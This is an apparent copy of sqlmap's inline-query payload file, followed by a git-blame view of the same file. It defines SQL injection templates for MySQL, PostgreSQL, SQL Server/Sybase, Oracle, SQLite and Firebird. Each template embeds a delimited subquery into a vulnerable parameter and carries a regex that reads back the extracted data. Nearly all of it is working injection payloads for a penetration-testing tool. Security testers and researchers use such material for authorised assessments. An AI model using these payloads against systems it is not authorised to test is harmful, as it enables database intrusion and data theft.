sqlmap/data/xml/payloads/inline_query.xml

<?xml version="1.0" encoding="UTF-8"?>

<root>
    <!-- Inline queries tests -->
    <test>
        <title>MySQL inline queries</title>
        <stype>3</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
        <request>
            <!-- These work as good as ELT(), but are longer
            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
            -->
            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>

    <test>
        <title>PostgreSQL inline queries</title>
        <stype>3</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
        <request>
            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase inline queries</title>
        <stype>3</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
        <request>
            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
            <os>Windows</os>
        </details>
    </test>

    <test>
        <title>Oracle inline queries</title>
        <stype>3</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
        <request>
            <!-- NOTE: Vertica works too without the TO_NUMBER() -->
            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>SQLite inline queries</title>
        <stype>3</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
        <request>
            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>SQLite</dbms>
        </details>
    </test>

    <test>
        <title>Firebird inline queries</title>
        <stype>3</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,8</clause>
        <where>3</where>
        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
        <request>
            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>Firebird</dbms>
        </details>
    </test>
    <!-- End of inline queries tests -->
</root>
split payloads in different files 2015-02-18 13:13:44 +03:00			`<?xml version="1.0" encoding="UTF-8"?>`

			`<root>`
			`<!-- Inline queries tests -->`
			`<test>`
			`<title>MySQL inline queries</title>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<stype>3</stype>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<level>1</level>`
			`<risk>1</risk>`
			`<clause>1,2,3,8</clause>`
			`<where>3</where>`
			`<vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>`
			`<request>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<!-- These work as good as ELT(), but are longer`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>`
			`-->`
			`<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`</request>`
			`<response>`
			`<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
			`</response>`
			`<details>`
			`<dbms>MySQL</dbms>`
			`</details>`
			`</test>`

			`<test>`
			`<title>PostgreSQL inline queries</title>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<stype>3</stype>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<level>1</level>`
			`<risk>1</risk>`
			`<clause>1,2,3,8</clause>`
			`<where>3</where>`
			`<vector>(SELECT '[DELIMITER_START]'\|\|([QUERY])::text\|\|'[DELIMITER_STOP]')</vector>`
			`<request>`
			`<payload>(SELECT '[DELIMITER_START]'\|\|(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text\|\|'[DELIMITER_STOP]')</payload>`
			`</request>`
			`<response>`
			`<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
			`</response>`
			`<details>`
			`<dbms>PostgreSQL</dbms>`
			`</details>`
			`</test>`

			`<test>`
			`<title>Microsoft SQL Server/Sybase inline queries</title>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<stype>3</stype>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<level>1</level>`
			`<risk>1</risk>`
			`<clause>1,2,3,8</clause>`
			`<where>3</where>`
			`<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>`
			`<request>`
			`<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>`
			`</request>`
			`<response>`
			`<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
			`</response>`
			`<details>`
			`<dbms>Microsoft SQL Server</dbms>`
			`<dbms>Sybase</dbms>`
			`<os>Windows</os>`
			`</details>`
			`</test>`

			`<test>`
			`<title>Oracle inline queries</title>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<stype>3</stype>`
			`<level>2</level>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<risk>1</risk>`
			`<clause>1,2,3,8</clause>`
			`<where>3</where>`
			`<vector>(SELECT ('[DELIMITER_START]'\|\|([QUERY])\|\|'[DELIMITER_STOP]') FROM DUAL)</vector>`
			`<request>`
Minor patch 2020-01-21 13:18:34 +03:00			`<!-- NOTE: Vertica works too without the TO_NUMBER() -->`
			`<payload>(SELECT '[DELIMITER_START]'\|\|(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END) FROM DUAL)\|\|'[DELIMITER_STOP]' FROM DUAL)</payload>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`</request>`
			`<response>`
			`<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
			`</response>`
			`<details>`
			`<dbms>Oracle</dbms>`
			`</details>`
			`</test>`

			`<test>`
			`<title>SQLite inline queries</title>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<stype>3</stype>`
			`<level>3</level>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<risk>1</risk>`
			`<clause>1,2,3,8</clause>`
			`<where>3</where>`
			`<vector>SELECT '[DELIMITER_START]'\|\|([QUERY])\|\|'[DELIMITER_STOP]'</vector>`
			`<request>`
			`<payload>SELECT '[DELIMITER_START]'\|\|(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))\|\|'[DELIMITER_STOP]'</payload>`
			`</request>`
			`<response>`
			`<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
			`</response>`
			`<details>`
			`<dbms>SQLite</dbms>`
			`</details>`
			`</test>`
added a newline 2015-03-03 17:18:53 +03:00
split payloads in different files 2015-02-18 13:13:44 +03:00			`<test>`
			`<title>Firebird inline queries</title>`
Consistency in enums 2015-02-20 21:33:04 +03:00			`<stype>3</stype>`
			`<level>3</level>`
split payloads in different files 2015-02-18 13:13:44 +03:00			`<risk>1</risk>`
			`<clause>1,2,3,8</clause>`
			`<where>3</where>`
			`<vector>SELECT '[DELIMITER_START]'\|\|([QUERY])\|\|'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>`
			`<request>`
			`<payload>SELECT '[DELIMITER_START]'\|\|(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)\|\|'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>`
			`</request>`
			`<response>`
			`<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
			`</response>`
			`<details>`
			`<dbms>Firebird</dbms>`
			`</details>`
			`</test>`
			`<!-- End of inline queries tests -->`
			`</root>`